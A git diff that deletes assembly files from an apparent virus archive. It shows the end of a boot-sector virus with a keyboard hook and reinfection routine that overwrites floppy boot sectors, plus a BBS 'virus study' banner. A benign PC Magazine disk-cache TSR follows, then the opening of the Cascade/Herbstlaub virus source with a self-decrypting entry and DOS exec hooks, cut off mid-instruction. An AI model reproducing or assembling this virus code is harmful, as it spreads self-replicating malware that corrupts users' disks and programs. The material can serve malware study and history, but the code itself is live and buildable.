-ACK_KEYBD: ; - IN AL,61H ;RESET KEYBOARD THEN CONTINUE - MOV AH,AL ; - OR AL,80H ; - OUT 61H,AL ; - XCHG AL,AH ; - OUT 61H,AL ; - JMP RBOOT ; - ; -;-----------------------------------------------------------------------; -; DATA AREA WHICH IS NOT USED IN THIS VERSION ; -; REASON UNKNOWN ; -;-----------------------------------------------------------------------; -TABLE DB 27H,0,1,2 ;FORMAT INFORMATION FOR TRACK 39 - DB 27H,0,2,2 ; (CURRENTLY NOT USED) - DB 27H,0,3,2 ; - DB 27H,0,4,2 ; - DB 27H,0,5,2 ; - DB 27H,0,6,2 ; - DB 27H,0,7,2 ; - DB 27H,0,8,2 ; - ; -;A7C9A LABEL BYTE ; - DW 00024H ;NOT USED - DB 0ADH ; - DB 07CH ; - DB 0A3H ; - DW 00026H ; - ; -;L7CA1: ; - POP CX ;NOT USED - POP DI ; - POP SI ; - POP ES ; - POP DS ; - POP AX ; - POPF ; - JMP 1111:1111 ; - ; -;-----------------------------------------------------------------------; -; IF ALT & CTRL & DEL THEN ... ; -; IF ALT & CTRL & ? THEN ... ; -;-----------------------------------------------------------------------; -NEW_09: PUSHF ; - STI ; - ; - PUSH AX ; - PUSH BX ; - PUSH DS ; - ; - PUSH CS ;DS=CS - POP DS ; - ; - MOV BX,[ALT_CTRL W] ;BX=SCAN CODE LAST TIME - IN AL,60H ;GET SCAN CODE - MOV AH,AL ;SAVE IN AH - AND AX,887FH ;STRIP 8th BIT IN AL, KEEP 8th BIT AH - ; - CMP AL,1DH ;IS IT A [CTRL]... - JNE N09_10 ;...JUMP IF NO - MOV BL,AH ;(BL=08 ON KEY DOWN, BL=88 ON KEY UP) - JMP N09_30 ; - ; -N09_10: CMP AL,38H ;IS IT AN [ALT]... - JNE N09_20 ;...JUMP IF NO - MOV BH,AH ;(BH=08 ON KEY DOWN, BH=88 ON KEY UP) - JMP N09_30 ; - ; -N09_20: CMP BX,0808H ;IF (CTRL DOWN & ALT DOWN)... - JNE N09_30 ;...JUMP IF NO - ; - CMP AL,17H ;IF [I]... - JE N09_X0 ;...JUMP IF YES - CMP AL,53H ;IF [DEL]... - JE ACK_KEYBD ;...JUMP IF YES - ; -N09_30: MOV [ALT_CTRL],BX ;SAVE SCAN CODE FOR NEXT TIME - ; -N09_90: POP DS ; - POP BX ; - POP AX ; - POPF ; - ; - DB 0EAH ;JMP F000:E987 -OLD_09 DW ? ; - DW 0F000H ; - ; -N09_X0: JMP N09_X1 ; - ; -;-----------------------------------------------------------------------; -; ; -;-----------------------------------------------------------------------; -RBOOT: MOV DX,03D8H ;DISABLE COLOR VIDEO !?!? - MOV AX,0800H ;AL=0, AH=DELAY ARG - OUT DX,AL ; - CALL DELAY ; - MOV [ALT_CTRL],AX ;AX=0 ; - ; - MOV AL,3 ;AH=0 ;SELECT 80x25 COLOR - INT 10H ; - MOV AH,2 ;SET CURSOR POS 0,0 - XOR DX,DX ; - MOV BH,DH ; PAGE 0 - INT 10H ; - ; - MOV AH,1 ;SET CURSOR TYPE - MOV CX,0607H ; - INT 10H ; - ; - MOV AX,0420H ;DELAY (AL=20H FOR EOI BELOW) - CALL DELAY ; - ; - CLI ; - OUT 20H,AL ;SEND EOI TO INT CONTROLLER - ; - MOV ES,CX ;CX=0 (DELAY) ;RESTORE FIRST 32 INT VECTORS - MOV DI,CX ; (REMOVING OUR INT 09 HANDLER!) - MOV SI,offset BEGIN - 128 ; - MOV CX,128 ; - CLD ; - REP MOVSB ; - ; - MOV DS,CX ;CX=0 ;DS=0 - ; - MOV Word Ptr [19H*4],offset NEW_19 ;SET INT 19 VECTOR - MOV [(19H*4)+2],CS ; - ; - MOV AX,0040H ;DS = ROM DATA AREA - MOV DS,AX ; - ; - MOV [0017H],AH ;AH=0 ;KBFLAG (SHIFT STATES) = 0 - INC Word Ptr [0013H] ;MEMORY SIZE += 1024 (WERE NOT ACTIVE) - ; - PUSH DS ;IF BIOS F000:E502 == 21E4... - MOV AX,0F000H ; - MOV DS,AX ; - CMP Word Ptr [0E502H],21E4H ; - POP DS ; - JE R_90 ; - INT 19H ; IF NOT...REBOOT - ; -R_90: JMP 0F000:0E502H ;...DO IT ?!?!?! - ; -;-----------------------------------------------------------------------; -; REBOOT INT VECTOR ; -;-----------------------------------------------------------------------; -NEW_19: XOR AX,AX ; - ; - MOV DS,AX ;DS=0 - MOV AX,[0410] ;AX=EQUIP FLAG - TEST AL,1 ;IF FLOPPY DRIVES ... - JNZ N19_20 ;...JUMP -N19_10: PUSH CS ;ELSE ES=CS - POP ES ; - CALL PUT_NEW_09 ;SAVE/REDIRECT INT 9 (KEYBOARD) - INT 18H ;LOAD BASIC - ; -N19_20: MOV CX,0004 ;RETRY COUNT = 4 - ; -N19_22: PUSH CX ; - MOV AH,00 ;RESET DISK - INT 13 ; - JB N19_81 ; - MOV AX,0201 ;READ BOOT SECTOR - PUSH DS ; - POP ES ; - MOV BX,offset BEGIN ; - MOV CX,1 ;TRACK 0, SECTOR 1 - INT 13H ; -N19_81: POP CX ; - JNB N19_90 ; - LOOP N19_22 ; - JMP N19_10 ;IF RETRY EXPIRED...LOAD BASIC - ; -;-----------------------------------------------------------------------; -; Reinfection segment. ; -;-----------------------------------------------------------------------; -N19_90: CMP DI,3456 ;IF NOT FLAG SET... - JNZ RE_INFECT ;...RE INFECT - ; -JMP_BOOT: ;PASS CONTROL TO BOOT SECTOR - JMP 0000:7C00H ; - ; -;-----------------------------------------------------------------------; -; Reinfection Segment. ; -;-----------------------------------------------------------------------; -RE_INFECT: ; - MOV SI,offset BEGIN ;COMPARE BOOT SECTOR JUST LOADED WITH - MOV CX,00E6H ; OURSELF - MOV DI,SI ; - PUSH CS ; - POP ES ; - CLD ; - REPE CMPSB ; - JE RI_12 ;IF NOT EQUAL... - ; - INC Word Ptr ES:[COUNTER_1] ;INC. COUNTER IN OUR CODE (NOT DS!) - ; -;MAKE SURE TRACK 39, HEAD 0 FORMATTED ; - MOV BX,offset TABLE ;FORMAT INFO - MOV DX,0000 ;DRIVE A: HEAD 0 - MOV CH,40-1 ;TRACK 39 - MOV AH,5 ;FORMAT - JMP RI_10 ;REMOVE THE FORMAT OPTION FOR NOW ! - ; -; <<< NO EXECUTION PATH TO HERE >>> ; - JB RI_80 ; - ; -;WRITE REAL BOOT SECTOR AT TRACK 39, SECTOR 8, HEAD 0 -RI_10: MOV ES,DX ;ES:BX = 0000:7C00, HEAD=0 - MOV BX,offset BEGIN ;TRACK 40H - MOV CL,8 ;SECTOR 8 - MOV AX,0301H ;WRITE 1 SECTOR - INT 13H ; - ; - PUSH CS ; (ES=CS FOR PUT_NEW_09 BELOW) - POP ES ; - JB RI_80 ;IF WRITE ERROR...JUMP TO BOOT CODE - ; - MOV CX,0001 ;WRITE INFECTED BOOT SECTOR ! - MOV AX,0301 ; - INT 13H ; - JB RI_80 ; IF ERROR...JUMP TO BOOT CODE - ; -RI_12: MOV DI,3456H ;SET ?JUST INFECTED ANOTHER ONE?... - INT 19H ;...FLAG AND REBOOT - ; -RI_80: CALL PUT_NEW_09 ;SAVE/REDIRECT INT 9 (KEYBOARD) - DEC Word Ptr ES:[COUNTER_1] ; (DEC. CAUSE DIDNT INFECT) - JMP JMP_BOOT ; - ; -;-----------------------------------------------------------------------; -; ; -;-----------------------------------------------------------------------; -N09_X1: MOV [ALT_CTRL],BX ;SAVE ALT & CTRL STATUS - ; - MOV AX,[COUNTER_1] ;PUT COUNTER_1 INTO RESET FLAG - MOV BX,0040H ; - MOV DS,BX ; - MOV [0072H],AX ; 0040:0072 = RESET FLAG - JMP N09_90 ; - ; -;-----------------------------------------------------------------------; -; DELAY ; -; ; -; ON ENTRY AH:CX = LOOP COUNT ; -;-----------------------------------------------------------------------; -DELAY: SUB CX,CX ; -D_01: LOOP $ ; - SUB AH,1 ; - JNZ D_01 ; - RET ; - ; -;-----------------------------------------------------------------------; -; ; -;-----------------------------------------------------------------------; -A7DF4 DB 27H,00H,8,2 - -COUNTER_1 DW 001CH -ALT_CTRL DW 0 -A7DFC DB 27H,0,8,2 - -;****************************************************************************; -; ; -; -=][][][][][][][][][][][][][][][=- ; -; -=] P E R F E C T C R I M E [=- ; -; -=] +31.(o)79.426o79 [=- ; -; -=] [=- ; -; -=] For All Your H/P/A/V Files [=- ; -; -=] SysOp: Peter Venkman [=- ; -; -=] [=- ; -; -=] +31.(o)79.426o79 [=- ; -; -=] P E R F E C T C R I M E [=- ; -; -=][][][][][][][][][][][][][][][=- ; -; ; -; *** NOT FOR GENERAL DISTRIBUTION *** ; -; ; -; This File is for the Purpose of Virus Study Only! It Should not be Passed ; -; Around Among the General Public. It Will be Very Useful for Learning how ; -; Viruses Work and Propagate. But Anybody With Access to an Assembler can ; -; Turn it Into a Working Virus and Anybody With a bit of Assembly Coding ; -; Experience can Turn it Into a far More Malevolent Program Than it Already ; -; Is. Keep This Code in Responsible Hands! ; -; ; -;****************************************************************************; diff --git a/c/CACHE (31).ASM b/c/CACHE (31).ASM deleted file mode 100755 index 84bd8c6..0000000 --- a/c/CACHE (31).ASM +++ /dev/null @@ -1,255 +0,0 @@ -INTERRUPTS SEGMENT AT 0H ;This is where the disk interrupt - ORG 13H*4 ;holds the address of its service routine -DISK_INT LABEL DWORD -INTERRUPTS ENDS - -CODE_SEG SEGMENT - ASSUME CS:CODE_SEG - ORG 100H ;ORG = 100H to make this into a .COM file -FIRST: JMP LOAD_CACHE ;First time through jump to initialize routine - - CPY_RGT DB '(C)1985 S.Holzner' ;A signature in bytes - TBL_LEN DW 64 ;<-- # OF SECTORS TO STORE IN CACHE, MIN=24, MAX=124. - ;THIS IS THE ONLY PLACE YOU MUST SET THIS NUMBER. EACH SECTOR = 512 BYTES. - TIME DW 0 ;Time used to time-stamp each sector - OLD_CX DW 0 ;Stores original value of CX (CX is used often) - LOW_TIM DW 0 ;Used in searching for least recently used sect. - INT13H DD 0 ;Stores the original INT 13H address - RET_ADR LABEL DWORD ;Playing games with the stack here to preserve - RET_ADR_WORD DW 2 DUP(0) ;flags returned by Int 13H - -DISK_CACHE PROC FAR ;The Disk interrupt will now come here. - ASSUME CS:CODE_SEG - CMP AX,201H ;Is this a read (AH=2) of 1 sector (AL=1)? - JE READ ;Yes, jump to Read - CMP AH,3 ;No. Perchance a write or format? - JB OLD_INT ;No, release control to old disk Int. - JMP WRITE ;Yes, jump to Write -OLD_INT:PUSHF ;Pushf for Int 13H's final Iret - CALL INT13H ;Call the Disk Int - JMP PAST ;And jump past all usual Pops -READ: PUSH BX ;Push just about every register ever heard of - PUSH CX - PUSH DX - PUSH DI - PUSH SI - PUSH DS - PUSH ES - MOV DI,BX ;Int 13H gets data address as ES:BX, switch to ES:DI - ASSUME DS:CODE_SEG ;Make sure all labels found correctly - PUSH CS ;Move CS into DS by pushing CS, popping DS - POP DS - MOV OLD_CX,CX ;Save original CX since we're about to use it - CMP DH,0 ;DH holds requested head -- head 0? - JNE NOT_FAT1 ;Nope, this can't be the first Fat sector - CMP CX,6 ;If this is the directory, check if we have a - JE FAT1 ; new disk. - CMP CX,2 ;Track 0 (CH)? Sector 2 (CL)? - JNE NOT_FAT1 ;If not, this sure isn't the FAT1 -FAT1: CALL FIND_MATCH ;DOS reads in this sector first to check disk format - JCXZ NONE ;We'll use it for a check-sum. Do we have it - MOV BX,DI ; stored yet? CX=0-->no. If yes, restore BX - MOV CX,OLD_CX ; and CX from original values - PUSHF ;And now do the Pushf and call of Int13H to read - CALL INT13H ; FAT1 - JC ERR ;If error, leave - MOV CX,256 ;No error, FAT1 was read, check our value -REPE CMPSW ; with CMPSW -- if no match, disk was changed - JCXZ BYE ;Everything checks out, Bingo, exit. - LEA SI,TABLE ;New Disk! Zero all the old disk's sectors - MOV CX,TBL_LEN ;Loop over all entries, DL holds drive # -CLR: CMP DS:[SI+2],DL ;Is this stored sector from the old disk? - JNE NO_CLR ;Nope, don't clear this entry - MOV WORD PTR DS:[SI],0 ;Match, zero this entry, zero first word -NO_CLR: ADD SI,518 ;Move on to next stored sector (512 bytes of stored - LOOP CLR ; sector and 3 words of identification & time-stamp) - JMP BYE ;Reset for new disk, let's leave -NONE: CALL STORE_SECTOR ;Store FAT1 if there was no match to it - JC ERR ;Error -- exit ungraciously - JMP BYE ;No Error, Bye. -NOT_FAT1: ;The requested sector was not FAT1. Let's - CALL FIND_MATCH ;get it. Or do we have it already? - JCXZ NO_MATCH ;No, jump to No_Match, store sector - MOV CX,512 ;ES:DI and DS:SI already set up from Find_Match -REP MOVSB ;Move 512 bytes to requested memory area - CMP WORD PTR [BX+4],0FFFFH ;Is this a a directory sector? - JE BYE ;Yes, don't reset time (already highest poss.) - INC TIME ;No, reset the time, this sector just accessed - MOV AX,TIME ;Move time into Time word of sector's 3 words - MOV [BX+4],AX ; of identification - JMP BYE ;And leave. If there's an article you'd like to -NO_MATCH: ;see, by all means write in C/O PC Magazine. - CALL STORE_SECTOR ;Don't have this sector yet, get it. - JC ERR ;If read failed, exit with error -BYE: CLC ;The exit point. Clear carry flag, set AX=1 - MOV AX,1 ; CY=0 --> no error, AH=0 --> error code = 0 -ERR: POP ES ;If error, preserve flags and AX with error code - POP DS ;Pop all conceivable registers (except AX) - POP SI - POP DI - POP DX - POP CX ;Now that the flags are set, we want to get the - POP BX ;old flags off the stack (put there by original -PAST: POP CS:RET_ADR_WORD ;Int call) To do that we save the return address - POP CS:RET_ADR_WORD[2] ;first and then pop the flags harmlessly - POP CS:OLD_CX ;into Old_CX, and then jump to RET_ADR. - JMP CS:RET_ADR ;Done with read. Now let's consider write. -WRITE: PUSH BX ;Push all registers, past and present - PUSH CX - PUSH DX - PUSH DI - PUSH SI - PUSH DS - PUSH ES - PUSH AX - CMP AX,301H ;Is this a write of one sector? - JNE NOSAVE ;No, don't save it in the sector bank - PUSH CS ;Yep, set DS (for call to Int13H label) and - POP DS ; write this sector out - PUSHF - CALL INT13H - JNC SAVE ;If there was an error we don't want to save sector - POP CS:OLD_CX ;Save AH error code, Pop old AX into Old_CX - JMP ERR ;And jump to an ignoble exit -SAVE: MOV OLD_CX,CX ;We're going to save this sector. - MOV DI,BX ;Set up DI for string move (to store written - CALL FIND_MATCH ; sector. Do we have it in memory? (set SI) - JCXZ LEAVE ;Nope, Leave (like above's Bye). - XCHG DI,SI ;Exchange destination and source - PUSH ES ;Set up DS:SI to point to where data written - POP DS ; from. We'll then use a string move - PUSH CS ;Set up ES so ES:DI points to sector bank - POP ES ; SI was set by Find_Match, Xchg'd into DI - MOV CX,512 ;Get ready to move 512 bytes -REP MOVSB ;Here we go -LEAVE: POP AX ;Here is the leave - JMP BYE ;Which only pops AX and then jumps to Bye -NOSAVE: PUSH CS ;More than 1 sector written, don't save but - POP DS ; do zero stored sectors that will be written - MOV AH,0 ;Use AX as loop index (AL=# of sectors to write) -TOP: PUSH CX ;Save CX since destroyed by Find_Match - CALL FIND_MATCH ;Do we have this one? - JCXZ NOPE ;Nope if CX = 0 - MOV WORD PTR [BX],0 ;There is a match, zero this sector -NOPE: POP CX ;Restore CX, the sector index - INC CL ;Move on to next one - DEC AX ;Decrement loop index - JNZ TOP ;And, unless that gives 0, go back again -POPS: POP AX ;Pop 'em all, starting with AX - POP ES - POP DS - POP SI - POP DI - POP DX - POP CX - POP BX - JMP OLD_INT ;And go back to OLD_INT for write. -DISK_CACHE ENDP - -FIND_MATCH PROC NEAR ;This routine finds a sector in the sector bank - PUSH AX ;And returns SI set to sector's entry, BX set - LEA SI,SECTORS ; to the beginning of the 'table' -- the 3 words - LEA BX,TABLE ;that precede all sectors. If there was no match - MOV AX,TBL_LEN ; CX=0. When Int13H called, CH=trk #, CL=sec. # - XCHG AX,CX ; DH=head #, DL=Drive #. Get Tbl_Len into CX -FIND: CMP DS:[BX],AX ;Compare stored sector's original AX to current - JNE NO ;If not, not. - CMP DS:[BX+2],DX ;If so, check DX of stored sector with current - JE GOT_IT ;Yes, there is a match, leave -NO: ADD BX,518 ;Point to next Table entry - ADD SI,518 ;And next sector too - LOOP FIND ;Keep looping until there is a match -GOT_IT: POP AX ;If there is no match, CX will be left 0 - RET ;Return -FIND_MATCH ENDP - -STORE_SECTOR PROC NEAR ;This routine, as it says, stores sectors - MOV BX,DI ;Original BX (ES:BX was original data address) - MOV CX,OLD_CX ; and CX restored (CX=trk#, Sector#) - PUSHF ;Pushf for Int 13H's Iret and call it - CALL INT13H - JNC ALL_OK ;If there was an exit, exit ignominiously - JMP FIN ;If error, leave CY flag set, code in AH, exit -ALL_OK: PUSH CX ;No error, push used registers - PUSH BX ; and find space for sector in sector bank - PUSH DX - LEA DI,SECTORS ;Point to sector bank - LEA BX,TABLE ; and Table - MOV CX,TBL_LEN ; and get ready to loop over all of them to -CHK0: CMP WORD PTR DS:[BX],0 ;find if there is an unused sector - JE FOUND ;If the first word is 0, use this sector - ADD DI,518 ;But this one isn't so update DI, SI and - ADD BX,518 ; loop again - LOOP CHK0 - MOV LOW_TIM,0FFFEH ;All sectors were filled, find least recently - LEA DI,SECTORS ; used and write over that one - LEA SI,TABLE - MOV CX,TBL_LEN ;Loop over all stored sectors -CHKTIM: MOV DX,LOW_TIM ;Compare stored sector to so-far low time - CMP [SI+4],DX - JA MORE_RECENT ;If this one is more recent, don't use it - MOV AX,DI ;This one is older than previous oldest - MOV BX,SI ;Store sector bank address (DI) and table - MOV DX,[SI+4] ; entry (now in SI) - MOV LOW_TIM,DX ;And update the Low Time to this one -MORE_RECENT: - ADD DI,518 ;Move on to next stored sector - ADD SI,518 ;And next table entry - LOOP CHKTIM ;Loop again until all covered - MOV DI,AX ;Get Sector bank address of oldest into DI -FOUND: POP DX ;Restore used registers - POP SI ;Old BX (data read-to-address) --> SI - POP CX - MOV [BX],CX ;Store the new CX as the sector's first word - MOV [BX+2],DX ;2nd word of Table is sector's DX - INC TIME ;Now find the new time - MOV AX,TIME ;Prepare to move it into 3rd word of Table - CMP DH,0 ;Is this directory or FAT? (time-->FFFF) - JNE SIDE1 ;If head is not 0, check other head - CMP CX,9 ;Head zero, trk# 0, first sector? (directory) - JLE DIR ;Yes, this is a piece we always want stored - JMP NOT_DIR ;No, definitely not FAT or directory -SIDE1: CMP DH,1 ;Head 1? - JNE NOT_DIR ;No, this is not File Alloc. Table or directory - CMP CX,2 ;Part of the top of the directory? - JA NOT_DIR ;No, go to Not_Dir and set time -DIR: MOV AX,0FFFFH ;Dir or FAT, set time high so always kept -NOT_DIR:MOV [BX+4],AX ;Not FAT or dir, store the incremented time - PUSH ES ;And now get the data to fill the sector - POP DS ;SI, DI already set. Now set ES and DS for - PUSH CS ; string move. - POP ES - MOV CX,512 ;Move 512 bytes -REP MOVSB ;Right here - CLC ;Clear the carry flag (no error) -FIN: RET ;Error exit here (do not reset CY flag) -STORE_SECTOR ENDP -TABLE: DW 3 DUP(0) ;Table and sector storage begins right here -SECTORS: ;First thing to write over is the following - ; booster program. -LOAD_CACHE PROC NEAR ;This procedure intializes everything - LEA BX,CLEAR - ASSUME DS:INTERRUPTS ;The data segment will be the Interrupt area - MOV AX,INTERRUPTS - MOV DS,AX - MOV AX,word ptr DISK_INT ;Get the old interrupt service routine - MOV word ptr INT13H,AX ; address and put it into our location MOV AX,word ptr DISK_INT[2] - ; INT13H so we can call it. - MOV word ptr INT13H[2],AX - MOV word ptr DISK_INT,OFFSET DISK_CACHE ;Now load address of Cache - MOV word ptr DISK_INT[2],CS ;routine into the Disk interrupt - MOV AX,TBL_LEN ;The number of sectors to store in cache - MOV CX,518 ;Multiply by 518 (3 words of id and 512 - MUL CX ; bytes of sector data) - MOV CX,AX ;Also, zero all the bytes so that -ZERO: MOV BYTE PTR CS:[BX],0 ; Store_Sector will find 1st word a 0, - INC BX ; indicating virgin territory. - LOOP ZERO - MOV DX,OFFSET TABLE ;To attach in memory, add # bytes to - ADD DX,AX ;store to Table's location and use - INT 27H ; Int 27H -LOAD_CACHE ENDP -CLEAR: - CODE_SEG ENDS - END FIRST ;END "FIRST" so 8088 will go to FIRST first. - \ No newline at end of file diff --git a/c/CASCADE (33).ASM b/c/CASCADE (33).ASM deleted file mode 100755 index 50095b0..0000000 --- a/c/CASCADE (33).ASM +++ /dev/null @@ -1,1188 +0,0 @@ -PAGE 62,132 -TITLE _HLV_ -SUBTTL Layout (C) 1990 164A12565AA18213165556D3125C4B962712 -.RADIX 16 -.LALL - -TRUE EQU 1 -FALSE EQU 0 - -MONTH EQU 9D -YEAR EQU 1991D - -DEMO EQU TRUE - -SWITCHABLE = TRUE -IFDEF _NOSWITCH -SWITCHABLE = FALSE -ENDIF - -comment # -ͻ - - ===================== - H E R B S T L A U B - ===================== - - - SPRACHE: MASM 4.00 (+) [ frhere Versionen brechen z.B. mit - (not v6.00 ! ) *OUT OF MEMORY* (3.00) ab oder lassen - sogar den PC abstrzen (1.10) ] - - ( Eine als Beispiel gedachte Batchdatei zur Steuerung der bersetzung - ist am Ende dieses Quelltextes als Kommentar hinzugefgt. ) - -ͼ -Ŀ - Whrend der bersetzung zu auszugebende Meldungen, 1. Teil. - -# -IF1 -REPT 50 -%Out -ENDM; -%Out ͻ -%Out -%Out Ŀ -%Out Ĵ H E R B S T L A U B İ -%Out ٰ -%Out -ENDIF -comment # -Ŀ - Einige Assembler - Makros. - -# ; -MSDOS MACRO ; - INT 21 ; - ENDM ; -Wait_HRI_or_VRI MACRO ; - LOCAL _X_1, _X_2, _X_3 ; - MOV DX,03DA ; - CLI ; - _X_1: IN AL,DX ; - TEST AL,08 ; - JNZ _X_3 ; - TEST AL,01 ; - JNZ _X_1 ; - _X_2: IN AL,DX ; - TEST AL,01 ; - JZ _X_2 ; - _X_3 LABEL NEAR ; - ENDM ;------; -SAVE MACRO _1,_2,_3,_4,_5,_6,_7,_8,_9,_a,_b,_c ; - IRP _X,<_1,_2,_3,_4,_5,_6,_7,_8,_9,_a,_b,_c> ; - IFNB <_X> ;------; - IFIDN <_X>, ; - PUSHF ; - ELSE ; - PUSH _X ; - ENDIF ; - ENDIF ; - ENDM ; - ENDM ;------; -REST MACRO _1,_2,_3,_4,_5,_6,_7,_8,_9,_a,_b,_c ; - IRP _X,<_1,_2,_3,_4,_5,_6,_7,_8,_9,_a,_b,_c> ; - IFNB <_X> ;------; - IFIDN <_X>, ; - POPF ; - ELSE ; - POP _X ; - ENDIF ; - ENDIF ; - ENDM ; - ENDM ; -MOV_S MACRO S1,S2 ; - PUSH S2 ; - POP S1 ; - ENDM ; - comment # -Ŀ - Start des Code-Segments, Segment Prefix Bytes werden n i c h t au- - tomatisch durch den Assembler erzeugt. - - # ; -TEXT SEGMENT ; - ASSUME CS:TEXT,DS:TEXT,ES:TEXT,SS:TEXT ; - comment # -Ŀ - Einige das Verstndnis erleichternde Definitionen. - - # ; -NearJmp EQU 0E9 ; -PORT_B_8259A EQU 20 ; -EOI_8259A EQU 20 ; -PORT_B_8255 EQU 61 ; -FIRSTCONST EQU 0131 ; -FIRSTBASE EQU FIRSTCONST - OFFSET XI_001 ;-----; -FIRSTBASE2 EQU (FIRSTCONST + OFFSET XI_005 - XI_001) ; -DeCrptd EQU 0 ;-----; -EnCrptd EQU 1 ; -BIOSDATASEG EQU 040 ; -MonoBase EQU 0B000 ; -ColorBase EQU 0B800 ; -B_VIDPAGE EQU THIS WORD + 04E ; -B_TIMERVAR EQU THIS WORD + 06C ; -TimerInt EQU 1C ; -DOS EQU 21 ; -DOS_multi EQU 2F ; -MS_SetDTA EQU 1A ; - DTA_in_PSP EQU 80 ; -MS_SetInt EQU 25 ; -MS_GetDateTime EQU 2A ; -MS_GetVer EQU 30 ; - DOS_v_02 EQU 2 ; -MS_GetInt EQU 35 ; -MS_Open EQU 3Dh ; - Read_Only EQU 0 ; - Read_Write EQU 2 ; -MS_Close EQU 3E ; -MS_Read EQU 3F ; -MS_Write EQU 40 ; -MS_MoveFP EQU 42 ; - OfsFrmTop EQU 0 ; - OfsFrmEnd EQU 02 ; -MS_GetFileAttr EQU 4300 ; -MS_SetFileAttr EQU 4301 ; - Attr_A EQU 20 ; - Attr_SHR EQU 7 ; - Attr_ASHR EQU Attr_A OR Attr_SHR ; -MS_AllocMem EQU 48 ; -MS_ReleaseMem EQU 49 ; - MemCBsig EQU THIS BYTE + 0 ; - MemCBowned EQU THIS WORD + 1 ; - MemCBsize EQU THIS WORD + 3 ; -MS_Exec EQU 4Bh ; - MS_Exec_SF0 EQU 0 ; - Virus_fun EQU 0ffh ; - Virus_Sig EQU 55AA ; -MS_SetPSP EQU 50 ; - PSPsize EQU 00100 ; - PSPCurCom EQU THIS WORD + 016 ; - PSPEnv EQU THIS WORD + 02C ; - PSP_SegJFB EQU THIS WORD + 036 ; - NoEnv EQU 0 ; -MS_GetFileDate EQU 5700 ; -MS_SetFileDate EQU 5701 ; -PSP_100 EQU THIS WORD + PSPsize ; -PSP_102 EQU THIS BYTE + PSPsize + 2 ; - comment # -Ŀ - Ab hier wird Objektcode erzeugt, Datenbereich Nr. 1. - - # ; -Crypt1 DB 0 ; -Crypt2 EQU OFFSET Crypt1 + FIRSTBASE ; -Crypt3 EQU Crypt1 + PSPsize ; - comment # -Ŀ - Einsprungstelle, entschlsseln des Virus falls notwendig. - - # ; -XI_000: CLI ; - MOV BP,SP ; - CALL XI_001 ; -XI_001: POP BX ; - SUB BX,FIRSTCONST ; - TEST BYTE PTR CS:[BX+Crypt2],EnCrptd ; - JZ XI_003 ; - LEA SI,[BX + XR_000] ; - MOV SP,OFFSET EOFC-OFFSET XI_003 ; -XI_002: XOR [SI],SI ; - XOR [SI],SP ; - INC SI ; - DEC SP ; - JNZ XI_002 ; -XI_003 LABEL NEAR ; - XR_000 EQU OFFSET XI_003 + FIRSTBASE ; - XR_001 EQU XI_003 + PSPsize ; - MOV SP,BP ; - JMP SHORT XI_004 ; - comment # -Ŀ - Datenbereich 2. - - # ; - XD_000 DW PSPsize ; -Disp_to_com_1 EQU OFFSET XD_000 + FIRSTBASE ; - XD_001 DW 9090 ; -Disp_to_com_2 EQU OFFSET XD_001 + FIRSTBASE ; - XD_002 DW 9090 ; -Initial_AX EQU OFFSET XD_002 + FIRSTBASE ; - XD_003 EQU THIS WORD ; - XD_004 EQU THIS BYTE + 2 ; - NOP ; - NOP ; - NOP ; -Org1stInstr_s1 EQU OFFSET XD_003 + FIRSTBASE ; -Org1stInstr_t1 EQU XD_003 + PSPsize ; -Org1stInstr_t2 EQU XD_003 + PSPsize + 1 ; -Org1stInstr_s2 EQU OFFSET XD_004 + FIRSTBASE ; - XD_005 DW 2 dup ( 9090 ) ; -Org_Int_1C EQU XD_005 + PSPsize ; - XD_006 DW 2 dup ( 9090 ) ; -Org_int_21s EQU OFFSET XD_006 + FIRSTBASE ; -Org_Int_21t EQU XD_006 + PSPsize ; - ; -IF SWITCHABLE ; - ; - XD_007 DW 2 dup ( 9090 ) ; -Org_Int_2F EQU XD_007 + PSPsize ; - XD_008 DB 5, "_HLV_ " ; -Cmd_2F EQU XD_008 + PSPsize ; - XD_009 DB 'HLV is on',0Dh,0Ah,'$' ; -Msg_On EQU XD_009 + PSPsize ; - XD_010 DB 'HLV is off',0Dh,0Ah,'$' ; -Msg_Off EQU XD_010 + PSPsize ; - ; -ENDIF ; - ; - XD_011 DW 9090 ; -File_Attributes EQU XD_011 + PSPsize ; - XD_012 DW 9090 ; -File_Date EQU XD_012 + PSPsize ; - XD_013 DW 9090 ; -File_Time EQU XD_013 + PSPsize ; - XD_014 DW 2 dup ( 9090 ) ; -Pathname EQU XD_014 + PSPsize ; - XD_015 DW 2 dup ( 9090 ) ; -File_Size_lsb EQU XD_015 + PSPsize ; -File_Size_msb EQU XD_015 + PSPsize + 2 ; - XD_016 DB NearJmp ; -FirstOpCode_1 EQU XD_016 + PSPsize ; - XD_017 DW 9090 ; -FirstOpCode_2 EQU XD_017 + PSPsize ; - XD_018 DB 90 ; -Num_of_Col EQU XD_018 + PSPsize ; - XD_019 DB 90 ; -Last_Line EQU XD_019 + PSPsize ; - XD_020 DB 90 ; -Prevent_Snow? EQU XD_020 + PSPsize ; -Last_Pair EQU THIS WORD + PSPsize ; - XD_021 DB 90 ; - XD_022 DB 90 ; -Last_Char EQU XD_021 + PSPsize ; -Last_Attr EQU XD_022 + PSPsize ; -RecTyp1 RECORD ExtCom:1, Recf_1:1, R_in_1c:1 ; - XD_023 RecTyp1 <0,0,0> ; -ISR_Flags EQU XD_023 + PSPsize ; - XD_024 DW 9090 ; -Seg_of_VRAM EQU XD_024 + PSPsize ; - XD_025 DW 9090 ; -Page_offset EQU XD_025 + PSPsize ; - XD_026 DW 9090 ; -Speed EQU XD_026 + PSPsize ; - XD_027 DW 9090 ; -XR_002 EQU XD_027 + PSPsize ; - XD_028 DW 9090 ; -XR_003 EQU XD_028 + PSPsize ; - XD_029 DW 9090 ; -Num_of_char EQU XD_029 + PSPsize ; - XD_030 DW 9090 ; -XR_004 EQU XD_030 + PSPsize ; - XD_031 DW 7 dup ( 9090 ) ; -FirstRandom EQU XD_031 + PSPsize ; -LastRandom EQU This Word + PSPsize ; - DW 9090 ; - comment # -Ŀ - Installieren u. relozieren falls notwendig. - - # ; -XI_004: CALL XI_005 ; -XI_005 LABEL NEAR ; -XR_005 EQU XI_005 + PSPsize ; - POP BX ; - SUB BX,FIRSTBASE2 ; - MOV CS:[BX+Disp_to_com_2],CS ; - MOV CS:[BX+Initial_AX],AX ; - MOV AX,CS:[BX+Org1stInstr_s1] ; - MOV [PSP_100],AX ; - MOV AL,CS:[BX+Org1stInstr_s2] ; - MOV [PSP_102],AL ; - PUSH BX ; - MOV AH,MS_GetVer ; - MSDOS ; - POP BX ; - CMP AL,DOS_v_02 ; - JB XI_006 ; - MOV AX,MS_Exec * 100 + 